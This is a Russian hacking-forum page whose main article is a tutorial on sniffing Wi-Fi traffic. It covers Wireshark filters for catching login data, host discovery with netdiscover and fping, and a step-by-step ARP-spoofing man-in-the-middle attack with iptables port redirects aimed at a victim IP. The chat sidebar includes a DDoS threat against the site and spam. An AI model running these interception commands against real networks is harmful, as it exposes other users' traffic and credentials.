Интересное в сети

Мы Вконтакте

Посетители

Сейчас на сайте: 12
Пользователей: 0
Гостей: 12

Пользователи онлайн:

- отсутствуют

Гости (20 последних):

Гость-2,

Гость-3,

Гость-4,

Гость-5,

Гость-6,

Гость-7,

Гость-8,

Гость-9,

Гость-10,

Гость-11,

Гость-12

Роботы:

- отсутствуют

Статистика

Категории меню

Чат

Чтобы оставлять сообщения - зарегистрируйтесь

MAZAXAKER
7 янв 2026, 23:45

С НОВЫМ ГОДОМ!
Stock
31 дек 2025, 21:35

С НОВЫМ 2026 ГОДОМ!
MAZAXAKER
15 дек 2025, 19:44

С НАСТУПАЮЩИМИ ПРАЗДНИКАМИ!! ПИШУ СПУСТЯ ГОД!! ВСЕМ ДОБРА!! СУГАК И ТОРТИК Я ПОМНЮ ВАС!
kvakaMatvey
14 дек 2025, 09:18

аааауу здесь кто то живой еще?
kvakaMatvey
14 дек 2025, 09:17

кто еще знает о сайте
Alexsandr7
27 ноя 2025, 18:21

Сайт жив, а где все темки, которые были так актуальны в 2010-2014?
andre96
20 ноя 2025, 00:44

да да жив
andre96
8 авг 2025, 00:09

мммм
buboniiick
23 июн 2025, 01:47

Ахереть, я с 12 года тут, этот сайт еще жив..
Братишка
6 июн 2025, 07:35

Stock нравится это
Stock
13 мая 2025, 22:19

Много с кем был знаком, многими умными и интересными людьми, С которыми давно уже потерял связь. Надеюсь у всех у них все хорошо и они смогли найти место в жизни.
Stock
13 мая 2025, 22:14

Про себя могу сказать, это не мой ник,это просто аккаунт который был спи* из дампа ,когда-то давно. Были времена 10-15е годы, много где сидел и даже был модером 2-3 форумах, которых давно уже нет. Хорошо что можно зайти и вспомнить, как музей молодости. Иногда на другие мертвые форумы тоже захожу через веб архив, тогда было совсем по другому. Тогда точно было лучше, была атмосфера своя. Не у всех был норм интернет и было уютнее
Stock
13 мая 2025, 22:08

Эх были времена. Интересно где сейчас все кто тут когда-то сидел?
MAZAXAKER
31 дек 2024, 22:36

????????????С НОВЫМ ГОДОМ????????????
MAZAXAKER
22 ноя 2024, 12:04

Tortik брат ????
Baron.power
14 ноя 2024, 21:06

como se descargan los programas? siempre que le doy a descargar me sale la pagina de inicio... ayuda por favor
Shuma_xD
29 окт 2024, 11:14

Хочу быть мамкиным *****ом 10 лет спустя снова
Shuma_xD
29 окт 2024, 11:14

Живые есть?
MAZAXAKER
2 окт 2024, 15:28

ГДЕ СУГАК? ????
admin
27 авг 2024, 08:25

*HeaDekBaT, устарели.
HeaDekBaT
27 авг 2024, 07:37

Зашел на сайт спустя много лет) где все разделы кейлоггеры вирусы и прочее?) что случилось
tayfun221
18 авг 2024, 18:28

всем привет! шикарный сайт хоть я и на вашем языке чайник )))) но кое что полезное найти можно всегда кто бы научись писать хотя бы калькулятолр ))) как мне энто тяжело дается(((
sal0g0n
22 июн 2024, 15:03

капец
XaXaTyH
14 апр 2024, 05:07
admin
12 апр 2024, 14:26

*Ravin234,
Ravin234
7 апр 2024, 19:44

в 20:00 будет начнем DDoS атаку на сайт , по дополнительной информации писать на почту dzheyms.respektovich*gmail.com или телеграм *Ops0321
Macin
14 мар 2024, 19:48

Подписывайтесь на наш канал, здесь t.me мы собрали лучший софт. На нашем канале содержится только лучшие программы для компьютера и все, кто подпишутся, получат доступ к ним.
RUSLAN19860808
7 мар 2024, 02:56

Подскажите как лучше создать аккаунты в телеграмме штук 10 надо для тапалки
hecker
6 мар 2024, 21:41

походу ответа нет
hecker
5 мар 2024, 23:24

крипторы

Закрыть Сохранить настройки Сохранить изменения Разбанить Удалить все

Вставить Отмена

Опрос на сайте

Как Вы нашли нас?

Анализ информации внутри сети Wi-Fi

Автор: admin | Дата: 13-04-2018, 17:10 | Комментариев: 0 | Просмотров: 31 576

Установка и запуск WireShark

WireShark - это известная утилита для анализа сетей. Для операционной системы Kali Linux она предоставлена в комплекте с набором основных программ. Есть версия для любителей Windows. Для установки на другие ОС Linux можно воспользоваться такой командой:

sudo apt-get install wireshark

После установки запустим утилиту. Можно запустить с помощью команды:

sudo wireshark

Дальше необходимо выбрать один из предложенных интерфейсов и начать анализ трафика. После запуска интерфейс программы будет разделен на три блока.

блок - настройка и управления утилитой.
блок - пакеты, которые были перехвачены.
блок - информация для расшифровки и получения данных с пакетов.

Для тестирования можно открыть браузер и начать заходить на разные сайты, входить в формы авторизации, добавлять картинки и т.д. Потом можно остановить wireshark и посмотреть, какие данные были получены.

Но так как в нашу утилиту попадают тонны трафика, то нужно использовать фильтры:

1. ip.proto - протокол 
2. ip.src - отправитель 
3. ip.dst - получатель 
4. ip.addr - любой адрес

Фильтры поддерживают использование логических операторов и выражений:

== - присваивание 
|| - логическое или 
& - логическое и 
> - больше 
< - меньше

На примере можно использовать метод "GET". Введем в поле фильтра запрос "http.request.method == "GET". Находим запись и нажимаем правой кнопкой мыши Follow->TCP Stream. У меня получилось проанализировать пакет, в котором была загружена картинка на хост. Был получен формат, а также другая информация в USEr-Agent. Вот такими способами можно отсеивать не нужную информацию и искать полезные данные в WireShark. Таким способом можно получить авторизационные данные, а также полностью расшифровывать пакеты "telnet".

Пример перехваченного пакета

Сбор информации

Далее нам нужно получить информацию о пользователях. Для этого можно использовать две утилиты netdiscover и fping. Начнем с первой, чтобы быстро получить список активных участников сети можно воспользоваться Nmap или netdiscover, но последний способ быстрее.

sudo netdiscover

После этого получаем информацию об участниках сети.

Участники сети

Если у вас очень много участников в сети, то можно воспользоваться утилитой fping. Для того чтобы просканировать необходимо ввести команду. После этого активные хосты будут отображены в файле:

fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt

Эту информацию можно использовать в WireShark. Например, для фильтрации по конкретному IP, можно воспользоваться командой:

ip.addr==192.168.0.100

Фильтрация по IP

Или, например, фильтрация по MAC-адресу:

eth.addr==68:3e:xx:xx:xx:xx

Фильтрация по MAC-адресу

Можно комбинировать запросы логическим «или» - ||:

eth.addr==68:3e:xx:xx:xx:xx || igmp

Комбинирование двух разных запросов

MITM-атака

Это, по сути, процесс, когда вы располагаетесь между роутером и пользователем сети и начинаете слушать все пакеты. Принцип действий хорошо показан на картинке:

Для этих задач есть специальные утилиты, но можно сделать все и ручками. Для этого необходимо сначала включить IP-форвординг и изменить правила iptablex:

sudo cat /proc/sys/net/ipv4/ip_forward #Проверка форвординга пакетов, если -включен, если 0-выключен.

echo "1" > /proc/sys/net/ipv4/ip_forward #Включаем форвординг пакетов 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 80 порта на 8282 

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 443 порта на 8282

Далее необходимо запустить команду. Перед этим обязательно запустить WireShark для снифа трафика, чтобы потом его можно было проанализировать:

arpfpoof -i <interface> -t <жертва> <шлюз>

Например, если вы проводите эту атаку в сети и IP нашей цели 192.168.0.100, то команда будет иметь такой вид:

arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1

Далее с фильтрами и другими данными информация анализируется в WireShark.

Заключение

Внимательно относитесь к использованию Wi-Fi в публичных сетях. Возможно, кто-то перехватывает ваш трафик. Поэтому лучшие не использовать недостоверные сети для передачи важных и конфиденциальных данных.

Пароль на все архивы: hh

Теги: Wi-Fi WireShark netdiscover перехват трафик

Категория: Пентест

Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

Анализ информации внутри сети Wi-Fi

Добавление комментария